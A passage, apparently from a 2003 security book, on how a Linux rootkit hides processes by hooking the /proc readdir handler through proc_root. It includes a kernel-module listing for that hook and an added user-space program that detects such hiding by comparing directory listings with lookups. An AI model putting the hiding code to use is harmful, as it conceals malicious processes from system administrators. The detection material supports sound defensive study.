Trapping Requests to the File System

The kernel exports the proc_root variable, the root entry (a struct proc_dir_entry, not an inode) of the virtual file system traditionally mounted on the /proc directory. If desired, the hacker can install a custom filter over it that conceals the hacker's processes from the administrator. In contrast to system-call hooking, trapping through proc_root is far less sensitive to the kernel version: proc_root is an exported symbol that the module loader resolves by name, so the module needs no hard-coded address of the system-call table, which certainly is an advantage. The layout of proc_dir_entry and file_operations is still kernel-version dependent, however: the listing below matches the 2.2/2.4-era kernels it was written for, while current kernels no longer export proc_root and have replaced the readdir member of file_operations with iterate/iterate_shared.

The simplest trapper can look like Listing 13.8. The idea is to replace the readdir handler of /proc with a wrapper that calls the original handler but hands it a substitute filldir callback; the substitute inspects every directory entry the kernel produces, silently drops the ones that must be hidden (the PIDs of the hacker's processes, for instance), and forwards all others to the real filldir. Only enumeration is affected: opening or stat-ing /proc/<pid> by name still succeeds, because that path goes through lookup rather than readdir, and this inconsistency is precisely what rootkit detectors look for. More detailed information on this topic can be found in the "Sub proc_root Quando Sumus" article published in issue 58 of the Phrack e-zine.

Listing 13.8: New filter for the proc_root file system

// Global pointer to the original filldir function.
filldir_t real_filldir;

// Pointer to the original readdir handler of /proc. It must be saved
// before the hook is installed, both so the hook can call it and so the
// module can restore it on unload.
static int (*old_readdir_root)(struct file *, void *, filldir_t);

// Returns nonzero for names that must not appear in a /proc listing
// (PIDs of hidden processes, the module's own entries, and so on).
// The hiding policy belongs to the rootkit and is not shown here.
static int isHidden(const char *name);

// Replacement filldir. The exact prototype of filldir_t follows the
// kernel headers in use (2.4 adds a trailing d_type argument).
static int new_filldir_root (void* __buf, const char* name, int namlen,
                             off_t offset, ino_t ino)
{
        // Analyze every file name in the directory.
        // If this is the name of the module, process, or network
        // connection that must be disguised, return zero; otherwise,
        // pass control to the original filldir function.
        if (isHidden (name)) return 0;
        return real_filldir (__buf, name, namlen, offset, ino);
}

// New readdir function
int new_readdir_root (struct file *a, void *b, filldir_t c)
{
        // Initialize the pointer to the original filldir function.
        // In general, it is not necessary to do this every time;
        // however, this is the simplest approach.
        real_filldir = c;
        return old_readdir_root (a, b, new_filldir_root);
}

// Install the custom filter. FILE_OPS stands for the file_operations
// pointer inside proc_dir_entry (proc_fops in the 2.4 headers).
old_readdir_root = proc_root.FILE_OPS->readdir;
proc_root.FILE_OPS->readdir = new_readdir_root;
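The filter in Listing 13.8 sits only in the readdir/filldir path, so a hidden PID can still be reached by name through lookup. The following user-space program is an added example, not code from the book or from the Phrack article: it enumerates /proc through readdir(3), then probes every PID up to pid_max with stat(2) and reports the PIDs that answer to lookup but are missing from the listing, which is the classic check against exactly this kind of hook. The fixture arrays (fixture_existing, fixture_listed) are constructed data standing in for a filtered /proc, and all function names are the example's own.

```c
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Lookup callback: 1 if "<procdir>/<pid>" exists, 0 otherwise. */
typedef int (*lookup_fn)(const char *procdir, pid_t pid);

/* Enumerate procdir through readdir(3), i.e. through the kernel's
 * readdir/filldir path that a Listing 13.8-style filter sits in. Only purely
 * numeric names (PIDs) are kept. Returns the count, or -1 if opendir fails. */
long list_proc_pids(const char *procdir, pid_t *out, size_t cap)
{
    DIR *d = opendir(procdir);
    struct dirent *e;
    size_t n = 0;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL && n < cap) {
        char *end;
        long v = strtol(e->d_name, &end, 10);
        if (*end != '\0' || v <= 0) continue;   /* not a PID directory */
        out[n++] = (pid_t)v;
    }
    closedir(d);
    return (long)n;
}

/* Lookup by name: stat("<procdir>/<pid>"). A filldir-level filter never sees
 * this path, so a hidden PID still answers here. */
int proc_pid_exists(const char *procdir, pid_t pid)
{
    char path[256];
    struct stat st;
    snprintf(path, sizeof path, "%s/%ld", procdir, (long)pid);
    return stat(path, &st) == 0;
}

int listed_contains(const pid_t *listed, size_t n, pid_t pid)
{
    for (size_t i = 0; i < n; i++)
        if (listed[i] == pid) return 1;
    return 0;
}

/* Core check: PIDs in 1..max_pid that lookup confirms but enumeration omits.
 * Returns how many were found; the first cap of them are stored in hidden. */
size_t find_hidden_pids(const pid_t *listed, size_t nlisted, lookup_fn lookup,
                        const char *procdir, pid_t max_pid,
                        pid_t *hidden, size_t cap)
{
    size_t nh = 0;
    for (pid_t pid = 1; pid <= max_pid; pid++) {
        if (!lookup(procdir, pid) || listed_contains(listed, nlisted, pid))
            continue;
        if (nh < cap) hidden[nh] = pid;
        nh++;
    }
    return nh;
}

/* Upper bound of the PID space, from /proc/sys/kernel/pid_max when readable. */
pid_t read_pid_max(void)
{
    long v = 0;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &v) != 1) v = 0; fclose(f); }
    return v > 0 ? (pid_t)v : 32768;
}

/* Constructed fixture (not real /proc data): the kernel knows PIDs 1, 2, 3, 7
 * and 42, but a readdir filter like Listing 13.8 drops 3 and 42. */
static const pid_t fixture_existing[] = {1, 2, 3, 7, 42};
static const pid_t fixture_listed[]   = {1, 2, 7};
static pid_t fixture_hidden[8];

static int fixture_lookup(const char *procdir, pid_t pid)
{
    (void)procdir;
    for (size_t i = 0; i < sizeof fixture_existing / sizeof *fixture_existing; i++)
        if (fixture_existing[i] == pid) return 1;
    return 0;
}

/* Runs the check on the fixture: returns 2, with fixture_hidden = {3, 42}. */
size_t check_fixture(void)
{
    return find_hidden_pids(fixture_listed, 3, fixture_lookup, "fixture", 64,
                            fixture_hidden, 8);
}

pid_t check_fixture_nth(size_t i) { return i < 8 ? fixture_hidden[i] : -1; }

int main(void)
{
    static pid_t listed[1 << 16], again[1 << 16], hidden[256];
    long n = list_proc_pids("/proc", listed, 1 << 16);
    if (n < 0) { perror("opendir /proc"); return 1; }
    size_t nh = find_hidden_pids(listed, (size_t)n, proc_pid_exists, "/proc",
                                 read_pid_max(), hidden, 256);
    /* A process started between the listing and the probe also looks "hidden";
     * re-list and drop candidates that are visible now. */
    long m = list_proc_pids("/proc", again, 1 << 16);
    size_t confirmed = 0;
    for (size_t i = 0; i < nh && i < 256; i++) {
        if (m >= 0 && listed_contains(again, (size_t)m, hidden[i])) continue;
        printf("pid %ld: reachable via lookup, absent from readdir\n", (long)hidden[i]);
        confirmed++;
    }
    printf("%zu suspicious PID(s)\n", confirmed);
    return confirmed ? 2 : 0;
}
```

Run it as root on the machine under suspicion; a clean system prints "0 suspicious PID(s)". The second listing only removes the race with processes created during the scan, so a PID that survives both passes is either hidden by a readdir-level hook or is a process whose directory the enumeration genuinely cannot see, and either case deserves a look at what is installed in proc_root's file operations.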
 


Shellcoder's Programming Uncovered (Uncovered series)
ISBN: 193176946X
Year: 2003
Pages: 164